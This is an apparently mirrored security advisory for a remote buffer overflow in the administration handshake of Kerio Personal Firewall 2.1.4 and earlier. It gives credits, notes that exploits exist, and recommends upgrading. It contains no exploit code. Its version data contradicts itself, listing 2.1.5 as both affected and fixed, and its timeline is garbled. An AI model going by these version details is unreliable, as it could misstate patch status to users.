A remote overflow exists in Kerio Personal Firewall (KPF). The KPF fails to check the boundary of handshake packets in the administration authentication process. By sending a specially crafted request during the handshake process to establish a connection to the administration port, a remote attacker can overflow a buffer and execute arbitrary code on the system with the privileges of the Kerio firewall, resulting in a loss of integrity.

- 时间线

2003-04-28 2003-03-03
2003-04-28 Unknow

- 解决方案

Upgrade to version 2.1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Kerio Personal Firewall Remote Authentication Packet Buffer Overflow Vulnerability
Boundary Condition Error 7180
Yes No
2003-04-28 12:00:00 2007-10-16 06:27:00
The discovery of this vulnerability has been credited to Emiliano Kargieman, Hernán Gips and Javier Burroni from Core Security Technologies. It should be noted that the s0h group has published an unofficial patch to address this issue.

- 受影响的程序版本

Kerio Personal Firewall 2 2.1.4
Kerio Personal Firewall 2 2.1.3
Kerio Personal Firewall 2 2.1.2
Kerio Personal Firewall 2 2.1.1
Kerio Personal Firewall 2 2.1
Kerio Personal Firewall 2 2.1.5

- 不受影响的程序版本

Kerio Personal Firewall 2 2.1.5

- 漏洞讨论

A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.

Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.

Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

CORE has released a proof-of-concept python exploit that triggers a denial of service.

An exploit has been made available by Alin-Adrian Anton <aanton@reversedhell.net>

An exploit has been developed by ThreaT of the Skin of Humanity group.

An exploit has been made available as part of the Metasploit Framework project.

- 解决方案

The vendor has released version 2.1.5 to address this vulnerability.


Kerio Personal Firewall 2 2.1

Kerio Personal Firewall 2 2.1.1

Kerio Personal Firewall 2 2.1.2

Kerio Personal Firewall 2 2.1.3

Kerio Personal Firewall 2 2.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站